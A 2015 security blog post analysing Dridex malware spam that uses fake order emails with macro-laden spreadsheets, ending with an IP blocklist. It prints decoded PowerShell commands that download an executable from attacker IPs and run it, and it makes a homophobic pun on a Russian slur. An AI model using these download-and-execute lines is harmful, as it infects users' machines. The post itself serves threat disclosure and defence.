Sponsored by..

Thursday 19 February 2015

Malware spam: "State Department" / "Order state T/N:" with a hidden message

These spam emails claim both to be from the "State Department" and somebody else at the same time, so I guess they must have been sent by the intern at Dridex HQ. And also they have a hidden message, apparently aimed at me..

From:    Hollie Wyatt , State Department
Date:    19 February 2015 at 12:13
Subject:    Order state T/N:XZ3543_327

Your order is ready for collection at your chosen store.View full order details T/N:XZ3543_327 in attached document.

Thanks!
Hollie Wyatt .
PRAETORIAN RESOURCES LTD

----------

From:    Jodi Russell , State Department
Date:    19 February 2015 at 12:16
Subject:    Order state T/N:HD6061_902

Your order is ready for collection at your chosen store.View full order details T/N:HD6061_902 in attached document.

Thanks!
Jodi Russell .
BARON OIL PLC

----------

From:    Nathanial Mckinney , State Department
Date:    19 February 2015 at 13:26
Subject:    Order state T/N:UH0141_809

Your order is ready for collection at your chosen store.View full order details T/N:UH0141_809 in attached document.

Thanks!
Nathanial Mckinney .
SIRIUS MINERALS PLC
Attached is a ZIP file that largely matches the reference number in the email, and inside that is a malicious spreadsheet called Order.xls which contains this macro.

In there is the usual combination of an encrypted string and decryption routine. Feed one into the other and you get..
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.123/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
But wait.. what's this?
http://85.143.166.123/ssdynamooss/sspidarss.cab
"Пидар" is not in my limited Russian vocabulary, but it seems to translate as a tradition type of meatball in gravy.

Faggots with more sauce!  Hooray

Incidentally, 85.143.166.123 is a Pirix IP in Russia, and I have also seen malicious activity on the following Pirix IPs:

85.143.166.123
85.143.166.72
85.143.166.132

37.139.47.167
37.139.47.103
37.139.47.117
37.139.47.105

So I think I'm going to recommend blocking a couple of Pirix /24s at the end.

Anyway.

The macro downloads a file from http://85.143.166.123/ssdynamooss/sspidarss.cab which it saves as %TEMP%\FgdgFFFgfgF.cab and it then attempts to EXPAND it to %TEMP%\FgdgFFFgfgF.exe which doesn't quite work as expected, because the .CAB file is already an .EXE file. Must the the intern again. Anyway, EXPAND simply copies the file from CAB to EXE so it still works.

This executable has a VirusTotal detection rate of 8/57. Automated analysis tools [1] [2] plus some private sources indicate that this malware calls out to some familiar IPs:

82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)

According to the Malwr report,  it drops the same Dridex DLL that has been doing the rounds all day, with a VirusTotal detection rate of 8/57.

Update:
A second spam run is happening, with various senders and subjects, for example:
Byron Pittman , Bill Department
Freda Kelly , Bill Department
Leroy Gallegos , Bill Department
Terrence Reyes , Bill Department
Tyson Miller , Bill Department
Marlene Morales , Bill Department
Royal Byrd , Bill Department
Larry Kramer , Bill Department
Jenna Sparks , Bill Department
Debra Thomas , Bill Department

LE8427_395.zip attached   
MM4565_687.zip attached
SL7772_820.zip attached
MF9529_495.zip attached
DH0645_249.zip attached
ED9340_241.zip attached
HJ7305_966.zip attached
UA0899_018.zip attached
HO2362_958.zip attached
JL3695_098.zip attached
There are three different ZIP files, containing either Order.xls, Confirmation.xls or order_tatus.xls (sic). The macro is similar to the one above, but has a couple of other download locations.
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://134.19.180.44/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;

These are:

134.19.180.44 (Global Layer, NL)
185.48.56.137 (Sinarohost, NL)

Payload is the same as before.


Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
85.143.166.0/24
37.139.47.0/24
134.19.180.44
185.48.56.137

1 comment:

AmazonOps said...

"Pidar" is a derogatory version of "homo" in Russian.